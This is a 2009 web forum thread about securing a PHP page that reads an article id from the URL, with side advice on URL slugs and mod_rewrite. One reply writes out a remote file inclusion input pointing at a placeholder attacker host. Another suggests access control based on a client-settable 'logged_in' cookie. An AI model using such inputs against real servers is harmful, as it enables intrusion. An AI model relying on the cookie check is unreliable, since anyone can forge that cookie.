SitePoint Sponsor |
|
User Tag List
Results 1 to 6 of 6
Thread: php security
-
May 18, 2009, 08:48 #1
php security
I had my website like www.example.com/article.php?id=14&title=today but I saw that it's easy to change the title by the hackers. So I change to www.example.com/article.php?id=14.
Is it secure like this or I have to do more work in my php script to not have problems with the hackers?
-
May 18, 2009, 10:10 #2
- Join Date
- Mar 2008
- Posts
- 1,149
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
In that respect, you are safe.
But as for client security goes in general, you may want to read this:
http://code.google.com/p/browsersec/wiki/Main
-
May 18, 2009, 10:26 #3
- Join Date
- Feb 2009
- Posts
- 60
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
There isn't much more you can do to protect the php superglobal $_GET[''] because anyone can alter the URL. In your chase it shouldn't be too big a problem because it seems you're only trying to use the id to display a pages' content. If you want to restrict people from viewing "special pages" then you'd probably want to include an "if statement" on the page you're looking to restrict.
For example if you want to let anyone view pages with id 1-5 keep the script the way you have it now. but lets say you want to restrict pages with the id 5-10 then you might want to use a login application so when someone logs in a cookie called "logged_in" is dropped. Then on pages 5-10 you used the "if statement" that might look something like this.
if(!isset($_COOKIE['logged_in'])){header ("Location: login.php");}
This is a basic code you use at the very top of pages 5-10. It will redirect people to your login page if they're not logged in.
You could also use:
$pageID=$_GET['id'];
if(!$pageID){echo"please do not play around with the URL";}
This will display a nice little message if anyone tries to delete the page id's.
These are just 2 simple examples, I hope this helped.
-
May 18, 2009, 11:56 #4
- Join Date
- Jun 2008
- Posts
- 126
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
sorin21us, "id=14" is potentially unsafe for your server because it could allow remote file inclusion attacks (RFI). What if someone calls the page with id=hxxp://hackersite.com/badphpscript.txt?
If you expect id to be numeric, your script should quit and do nothing if the value sent for id contains anything other than digits.
-
May 19, 2009, 10:27 #5
Thank you for your answers. I belive sk89q that with only the article id in the title will be secure for now.
I wanted to make it with sessions, like royalty066 says, with a login system, but the site is about news and tutorials and I don't know if someone likes to read it after he has to log in.
I saw on other sites that in the title the have like www.example.com/today-news-example.php.
Can someone tell me how to do that?
-
May 19, 2009, 11:52 #6
- Join Date
- Mar 2008
- Posts
- 1,149
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
When you save the article, save a shruken down and normalized title (i.e. Today's News Example -> "todays-news-example"), and you can query your database (or file system) by that normalized title instead of an ID #. Then you could have a script that could be accessed like so: article.php?slug=todays-news-example. To get the articles to have an .php extension and appear as files in a directory, you can use something called mod_rewrite (if you use Apache for your web server).
I would still keep an ID # if you are using a database though, because it's a more permanent identifier.
Although in your original post, you were referring to how you could display an article's title, not get to the article by its title.
Bookmarks